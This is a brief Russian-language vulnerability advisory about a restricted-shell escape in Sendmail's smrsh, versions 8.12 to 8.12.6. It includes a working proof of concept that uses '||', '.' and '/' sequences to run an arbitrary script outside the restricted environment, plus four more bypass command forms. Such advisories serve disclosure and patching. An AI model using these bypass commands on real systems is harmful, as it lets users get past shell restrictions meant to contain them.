Sendmail — популярный почтовый агент для UNIX систем. 

Программа smrsh (Sendmail Consortium-s Restricted SShell) разработана для предотвращения выполнения команд вне ограниченной среды. Однако, когда задаются команды
с использованием символов (||),(.) или (/), пользователи могут обойти проверки, выполняемые smrsh. Уязвимость позволяет пользователям выполнять команды не ограниченной среды.

Пример: 

$ echo «echo unauthorized execute» > /tmp/unauth 
$ smrsh -c «. || . /tmp/unauth || .» 
/bin/sh: /etc/smrsh/.: is a directory 
unauthorized execute 

Или одну из следующих типов команд: 

smrsh -c «/ command» 
smrsh -c «../ command» 
smrsh -c «./ command» 
smrsh -c «././ command» 

Уязвимость обнаружена в Sendmail Consortium Sendmail 8.12-8.12.6.



Оставить мнение